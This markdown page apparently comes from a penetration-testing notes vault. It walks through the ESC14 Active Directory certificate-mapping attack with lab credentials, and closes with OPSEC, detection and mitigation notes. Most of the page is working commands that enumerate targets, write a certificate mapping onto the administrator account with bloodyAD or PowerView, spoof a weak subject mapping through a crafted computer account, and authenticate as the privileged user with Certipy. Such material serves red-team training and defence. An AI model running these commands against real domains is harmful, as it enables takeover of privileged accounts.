esc14-weak-explicit-certificate-mapping.md (9526B)
1 --- 2 title: "ESC14 — Weak Explicit Certificate Mapping" 3 description: "ESC14 targets the altSecurityIdentities attribute on AD user and computer objects. This multi-valued attribute is used for explicit certificate-to-account…" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "privilege-escalation", "hashing"] 7 tools: ["Impacket", "Certipy", "BloodHound", "ldapsearch", "OpenSSL"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/ESC14 — Weak Explicit Certificate Mapping.md" 11 --- 12 # ESC14 — Weak Explicit Certificate Mapping 13 14 ## Quick Reference 15 16 | Field | Value | 17 |-------|-------| 18 | **Category** | Explicit Certificate Mapping Abuse | 19 | **Difficulty** | Medium | 20 | **Pre-requisites** | Write access to `altSecurityIdentities` OR existing weak mapping on target | 21 | **Tools** | Certipy, BloodHound, PowerView, LDAP tools | 22 | **OPSEC Noise** | Medium — AD attribute modification | 23 | **One-liner** | Abuse weak explicit certificate mappings in `altSecurityIdentities` to bind your own certificate to a privileged account, or manipulate your account attributes to match an existing weak mapping on a target. | 24 25 *** 26 27 ## What Is ESC14? 28 29 ESC14 targets the `altSecurityIdentities` attribute on AD user and computer objects. This multi-valued attribute is used for **explicit certificate-to-account mapping** — it tells the DC "when this specific certificate is presented, map it to this specific account." The values in this attribute define **how** the mapping is performed. 30 31 The vulnerability: Windows supports multiple mapping types, and some are **cryptographically weak** — they rely on easily spoofable identifiers like the Subject Common Name or Issuer DN rather than unique, cryptographic identifiers like serial numbers or public key hashes. 32 33 ESC14 has **two distinct attack scenarios**: 34 35 | Scenario | Pre-requisite | Method | 36 |----------|--------------|--------| 37 | **ESC14a — Write Access** | `GenericWrite` on target's `altSecurityIdentities` | Add your own certificate mapping to the target account | 38 | **ESC14b — Existing Weak Mapping** | Target already has a weak mapping + `GenericWrite` on your own account | Modify your attributes to match the target's weak mapping criteria | 39 40 *** 41 42 ## Certificate Mapping Types — Strong vs Weak 43 44 The `altSecurityIdentities` attribute supports these formats: 45 46 | Mapping Type | Format | Strength | Spoofable? | 47 |-------------|--------|----------|------------| 48 | `X509:<I>issuer<S>subject` | Issuer + Subject DN | 🟡 Weak | ✅ If you control subject | 49 | `X509:<S>subject` | Subject DN only | 🔴 Very Weak | ✅ Easily | 50 | `X509:<I>issuer<SR>serial` | Issuer + Serial Number | 🟢 Strong | ❌ | 51 | `X509:<SKI>keyid` | Subject Key Identifier | 🟢 Strong | ❌ | 52 | `X509:<SHA1-PUKEY>hash` | SHA1 of Public Key | 🟢 Strong | ❌ | 53 | `X509:<RFC822>email` | RFC822 email (SAN) | 🔴 Very Weak | ✅ | 54 55 > ⚠️ The weak types (`X509:<S>`, `X509:<I><S>`, `X509:<RFC822>`) can be exploited because the attacker can **craft a certificate** (or modify their own AD attributes) to match the mapping criteria. 56 57 *** 58 59 ## Required Conditions 60 61 ### ESC14a — Write Access to altSecurityIdentities 62 63 | Condition | Notes | 64 |-----------|-------| 65 | `GenericWrite` or `WriteProperty` on target's `altSecurityIdentities` | BloodHound ACE edge | 66 | You control a certificate (any cert you can authenticate with) | Even a self-signed cert works if added to NTAuthCA | 67 | **OR** access to legitimate enrollment | Standard ADCS enrollment | 68 69 ### ESC14b — Existing Weak Mapping 70 71 | Condition | Notes | 72 |-----------|-------| 73 | Target account has a weak `altSecurityIdentities` mapping | `X509:<S>` or `X509:<I><S>` format | 74 | You have `GenericWrite` on **your own** account (or a controlled account) | To modify attributes to match the mapping | 75 | Access to a Client Auth template for enrollment | Standard ADCS enrollment | 76 77 *** 78 79 ## Step 0 — Enumeration 80 81 ```bash 82 # Check for altSecurityIdentities on high-value targets 83 # From Linux via LDAP 84 ldapsearch -x -H ldap://$TARGET -D 'lowpriv@domain.htb' -w 'Password123!' \ 85 -b "DC=domain,DC=htb" \ 86 '(altSecurityIdentities=*)' dn altSecurityIdentities 87 88 # From PowerShell 89 Get-ADUser -Filter {altSecurityIdentities -like '*'} \ 90 -Properties altSecurityIdentities | 91 Select-Object Name, altSecurityIdentities 92 93 # Check for computer accounts too 94 Get-ADComputer -Filter {altSecurityIdentities -like '*'} \ 95 -Properties altSecurityIdentities | 96 Select-Object Name, altSecurityIdentities 97 ``` 98 99 ### BloodHound Queries 100 101 ```cypher 102 // Find principals with write access to altSecurityIdentities on admin accounts 103 MATCH (n)-[r:GenericWrite|GenericAll|WriteProperty]->(m:User) 104 WHERE m.admincount = True 105 RETURN n.name, type(r), m.name 106 107 // Find accounts with altSecurityIdentities set 108 MATCH (n:User) WHERE n.altsecurityidentities IS NOT NULL 109 RETURN n.name, n.altsecurityidentities 110 ``` 111 112 *** 113 114 ## ESC14a — Write Access Attack Chain 115 116 When you have write access to a target's `altSecurityIdentities`, you simply **add a mapping** that points to a certificate you control. 117 118 ### Step 1 — Request a Certificate for Yourself 119 120 ```bash 121 certipy-ad req \ 122 -u 'lowpriv@domain.htb' \ 123 -p 'Password123!' \ 124 -dc-ip $TARGET \ 125 -ca 'DOMAIN-CA-NAME' \ 126 -template 'User' 127 128 # Output: lowpriv.pfx 129 ``` 130 131 ### Step 2 — Extract Certificate Details 132 133 ```bash 134 # Get the Subject DN from your certificate 135 certipy-ad cert -pfx lowpriv.pfx -nokey -out lowpriv.crt 136 openssl x509 -in lowpriv.crt -noout -subject -issuer 137 138 # Output example: 139 # subject= /DC=htb/DC=domain/CN=Users/CN=lowpriv 140 # issuer= /DC=htb/DC=domain/CN=DOMAIN-CA 141 ``` 142 143 ### Step 3 — Add Explicit Mapping to Target Account 144 145 ```bash 146 # Using BloodyAD 147 bloodyAD -d 'domain.htb' -u 'lowpriv' -p 'Password123!' --host $TARGET \ 148 set object administrator altSecurityIdentities \ 149 -v "X509:<I>DC=htb,DC=domain,CN=DOMAIN-CA<S>DC=htb,DC=domain,CN=Users,CN=lowpriv" 150 151 # Using PowerView 152 Set-DomainObject -Identity administrator \ 153 -Set @{'altSecurityIdentities'='X509:<I>DC=htb,DC=domain,CN=DOMAIN-CA<S>DC=htb,DC=domain,CN=Users,CN=lowpriv'} 154 ``` 155 156 ### Step 4 — Authenticate as Administrator Using Your Certificate 157 158 ```bash 159 certipy-ad auth \ 160 -pfx lowpriv.pfx \ 161 -username administrator \ 162 -domain domain.htb \ 163 -dc-ip $TARGET 164 165 # The DC checks administrator's altSecurityIdentities 166 # Finds a mapping matching your cert's Issuer+Subject 167 # Grants you access as administrator 168 ``` 169 170 ### Step 5 — Clean Up (Remove the Mapping) 171 172 ```bash 173 bloodyAD -d 'domain.htb' -u 'lowpriv' -p 'Password123!' --host $TARGET \ 174 set object administrator altSecurityIdentities -v "" 175 ``` 176 177 *** 178 179 ## ESC14b — Existing Weak Mapping Attack Chain 180 181 When the target already has a weak explicit mapping, you modify **your own account** to match the mapping criteria. 182 183 ### Example Scenario 184 185 Target: `admin-svc` has mapping: 186 ``` 187 altSecurityIdentities: X509:<S>CN=Admin Service Account 188 ``` 189 190 This mapping only checks the Subject CN — anyone with a cert where `CN=Admin Service Account` will be mapped to this account. 191 192 ### Step 1 — Modify Your Account's CN (If Possible) 193 194 ```bash 195 # If you have GenericWrite on an account, modify its CN to match 196 # More commonly: create a new computer account with matching attributes 197 impacket-addcomputer \ 198 'domain.htb/lowpriv:Password123!' \ 199 -dc-ip $TARGET \ 200 -computer-name 'Admin Service Account$' \ 201 -computer-pass 'EvilPass!' 202 ``` 203 204 ### Step 2 — Request Certificate with Matching Subject 205 206 ```bash 207 certipy-ad req \ 208 -u 'Admin Service Account$@domain.htb' \ 209 -p 'EvilPass!' \ 210 -dc-ip $TARGET \ 211 -ca 'DOMAIN-CA-NAME' \ 212 -template 'Machine' 213 214 # The cert's Subject CN will match the weak mapping 215 ``` 216 217 ### Step 3 — Authenticate as the Target 218 219 ```bash 220 certipy-ad auth \ 221 -pfx 'admin service account.pfx' \ 222 -username 'admin-svc' \ 223 -domain domain.htb \ 224 -dc-ip $TARGET 225 ``` 226 227 *** 228 229 ## OPSEC Considerations 230 231 | Action | Log Generated | Noise Level | 232 |--------|--------------|-------------| 233 | Reading altSecurityIdentities | LDAP query — low noise | 🟢 Low | 234 | Writing altSecurityIdentities | Event ID 5136 (Directory Service Changes) | 🔴 High | 235 | Certificate enrollment | Event ID 4886/4887 | 🟢 Low | 236 | Auth with explicit mapping | Event ID 4768 | 🟡 Medium | 237 238 *** 239 240 ## Detection Indicators 241 242 - **Event ID 5136** — Modification of `altSecurityIdentities` attribute, especially on privileged accounts 243 - **Event ID 4768** — Certificate-based TGT request where the mapping source is `altSecurityIdentities` rather than UPN/SAN 244 - **Audit `altSecurityIdentities`** — Any value using weak mapping types (`X509:<S>`, `X509:<RFC822>`) on privileged accounts is a finding 245 - **BloodHound** — `GenericWrite` or `WriteProperty` edges to accounts with `altSecurityIdentities` set 246 247 *** 248 249 ## Mitigation 250 251 - **Use only strong mapping types** — Replace all `X509:<S>` and `X509:<I><S>` mappings with `X509:<I><SR>` (Issuer + Serial) or `X509:<SHA1-PUKEY>` (SHA1 Public Key Hash) 252 - **Restrict write access to `altSecurityIdentities`** — Only Tier 0 admins should be able to modify this attribute on any account 253 - **Audit all existing mappings** — Run a domain-wide query for `altSecurityIdentities` and review every value 254 - **Set `StrongCertificateBindingEnforcement = 2`** — Forces SID-based validation on implicit mappings, though explicit mappings via `altSecurityIdentities` may still work 255 - **Monitor for attribute changes** — Alert on any modification to `altSecurityIdentities` on privileged accounts